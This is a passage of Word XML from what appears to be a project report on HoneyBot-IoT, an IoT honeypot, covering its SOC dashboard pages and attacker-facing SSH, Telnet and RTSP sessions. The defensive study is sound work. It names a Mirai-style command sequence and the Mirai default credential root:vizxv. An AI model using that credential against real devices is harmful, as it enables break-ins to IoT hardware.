        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00240A5B" w14:paraId="73B7AF7E" w14:textId="77777777" w:rsidTr="00240A5B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1688"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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Prometheus 2.53, Grafana 11.1, cAdvisor 0.49</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="167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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Monitoring (optional)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2016"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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Application and container metrics, alert rules and a provisioned dashboard.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3986"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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">/api/metrics, prometheus.yml</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00240A5B" w14:paraId="73B7AF7E" w14:textId="77777777" w:rsidTr="00240A5B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1688"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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">pytest 8.1.1, httpx 0.27.0, bandit 1.7.8, vitest 4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="167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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Testing / lint</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2016"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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Backend and API tests, dashboard unit tests; static security analysis.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3986"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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">pytest, fastapi.testclient, vitest, bandit -r .</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1CF48B6F" w14:textId="54F0A1AE" w:rsidR="003272AD" w:rsidRPr="005C6601" w:rsidRDefault="005C6601" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="9027" w:name="_Toc69027"/>
      <w:r>
        <w:t xml:space="preserve">7.3 User Interface</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9027"/>
    </w:p>
    <w:p w14:paraId="589378CE" w14:textId="7E0FB37B" w:rsidR="003272AD" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">HoneyBot-IoT provides the analyst-facing SOC dashboard and the attacker-facing device interfaces. The dashboard screenshots below were captured from the 70% build (v0.7) running under Docker Compose, after the bundled attack simulator had run its ten scenarios from inside the honeynet (docker compose --profile sim run attacker). The simulator uses one lab address, which is placed on the map in demo mode and tagged DEMO (geo_source = demo). The attacker-facing screenshots are unchanged from the 60% build.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F37E5F8" w14:textId="77777777" w:rsidR="002C2A3E" w:rsidRPr="006428C0" w:rsidRDefault="002C2A3E" w:rsidP="002C2A3E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="9028" w:name="_Toc69028"/>
      <w:r>
        <w:t xml:space="preserve">SOC Dashboard (Analyst-Facing)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9028"/>
    </w:p>
    <w:p w14:paraId="589378CE" w14:textId="7E0FB37B" w:rsidR="003272AD" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The overview page shows live counters, the attack timeline per protocol, sessions by protocol, the offline attack-origin map and the top threats. Detect now forces a classification pass; the sidebar shows the WebSocket status and service health.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="4572000" cy="3175000"/>
            <wp:docPr id="27" name="Picture 27"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="dash_top.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId39"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="3175000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CF3682" w14:textId="7FA23AD5" w:rsidR="003272AD" w:rsidRDefault="005C6601" w:rsidP="006238CF">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r>
          <w:t xml:space="preserve">24</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">: SOC Dashboard — Threat Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589378CE" w14:textId="7E0FB37B" w:rsidR="003272AD" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The detections page lists every detection with severity, evidence and ATT&amp;CK technique IDs, filterable by severity and type, next to the ranking of observed techniques and the latest indicators of compromise.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="4572000" cy="3175000"/>
            <wp:docPr id="28" name="Picture 28"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="dash_mid.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId40"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="3175000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CF3682" w14:textId="7FA23AD5" w:rsidR="003272AD" w:rsidRDefault="005C6601" w:rsidP="006238CF">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r>
          <w:t xml:space="preserve">25</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">: SOC Dashboard — Detections and MITRE ATT&amp;CK Ranking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589378CE" w14:textId="7E0FB37B" w:rsidR="003272AD" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The attacker page correlates everything one source address did across protocols: threat score, detections, sessions, credentials tried, indicators and dropped samples.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="4572000" cy="3175000"/>
            <wp:docPr id="29" name="Picture 29"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="dash_bottom.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId41"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="3175000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CF3682" w14:textId="7FA23AD5" w:rsidR="003272AD" w:rsidRDefault="005C6601" w:rsidP="006238CF">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r>
          <w:t xml:space="preserve">26</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">: SOC Dashboard — Attacker Profile Correlated Across Protocols</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003272AD" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Session replay shows one connection in order: attacker input and honeypot output, the login, the device state change it caused and the MITRE techniques of each command.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="4572000" cy="3175000"/>
            <wp:docPr id="30" name="Picture 30"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="session.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9010"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="3175000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="003272AD" w:rsidRDefault="005C6601" w:rsidP="006238CF">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r>
          <w:t xml:space="preserve">27</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">: SOC Dashboard — Session Replay (Telnet, Industrial Sensor)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003272AD" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The device page of the industrial sensor shows the live readings and their history, the writable configuration and every unauthorised change with the protocol and address that made it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="4572000" cy="3175000"/>
            <wp:docPr id="31" name="Picture 31"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="device-sensor.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9011"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="3175000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="003272AD" w:rsidRDefault="005C6601" w:rsidP="006238CF">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r>
          <w:t xml:space="preserve">28</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">: SOC Dashboard — Industrial Sensor Device Page</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003272AD" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Indicators of compromise with the number of distinct sightings, the STIX 2.1 download and the ATT&amp;CK coverage of all detections.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="4572000" cy="3175000"/>
            <wp:docPr id="32" name="Picture 32"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="iocs.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9012"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="3175000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="003272AD" w:rsidRDefault="005C6601" w:rsidP="006238CF">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r>
          <w:t xml:space="preserve">29</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">: SOC Dashboard — IOCs and MITRE ATT&amp;CK Coverage</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003272AD" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The reports page generates the analyst summary for 24 hours, 7 days or 30 days and offers the PDF report, STIX bundle, event CSV and the Module 8 dataset as downloads.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="4572000" cy="3175000"/>
            <wp:docPr id="33" name="Picture 33"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="reports.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9013"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="3175000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="003272AD" w:rsidRDefault="005C6601" w:rsidP="006238CF">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r>
          <w:t xml:space="preserve">30</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">: SOC Dashboard — Reports, Exports and Alert Log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F37E5F8" w14:textId="77777777" w:rsidR="002C2A3E" w:rsidRPr="006428C0" w:rsidRDefault="002C2A3E" w:rsidP="002C2A3E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="9029" w:name="_Toc69029"/>
      <w:r>
        <w:t xml:space="preserve">Protocol Sessions (Attacker-Facing)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9029"/>
    </w:p>
    <w:p w14:paraId="589378CE" w14:textId="7E0FB37B" w:rsidR="003272AD" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A real session on the SSH honeypot. Device commands read the shared state; the Mirai preamble (enable, system, shell, sh) is answered silently like a real device; the wget download is simulated and the URL is captured as an IOC.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="4754880" cy="3911272"/>
            <wp:docPr id="34" name="Picture 34"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="term_ssh.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId42"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4754880" cy="3911272"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CF3682" w14:textId="7FA23AD5" w:rsidR="003272AD" w:rsidRDefault="005C6601" w:rsidP="006238CF">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r>
          <w:t xml:space="preserve">31</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">: SSH Session on the Smart Lock (:2222) — Mirai-style Command Sequence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589378CE" w14:textId="7E0FB37B" w:rsidR="003272AD" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The sensor accepts a Mirai default credential (root:vizxv). sensorctl changes the alarm threshold in Redis, which is then visible on the HTTP HMI and the MQTT sensor/config topic.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="3840480" cy="4441018"/>
            <wp:docPr id="35" name="Picture 35"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="term_telnet.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId43"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3840480" cy="4441018"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CF3682" w14:textId="7FA23AD5" w:rsidR="003272AD" w:rsidRDefault="005C6601" w:rsidP="006238CF">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r>
          <w:t xml:space="preserve">32</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">: Telnet Session on the Industrial Sensor (:2323)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589378CE" w14:textId="7E0FB37B" w:rsidR="003272AD" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">OPTIONS lists the supported methods, DESCRIBE without credentials returns both Digest and Basic challenges, and a default credential returns a valid H.264 SDP accepted by VLC and ffprobe.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5120640" cy="4608576"/>
            <wp:docPr id="36" name="Picture 36"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="term_rtsp.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId44"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5120640" cy="4608576"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CF3682" w14:textId="7FA23AD5" w:rsidR="003272AD" w:rsidRDefault="005C6601" w:rsidP="006238CF">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
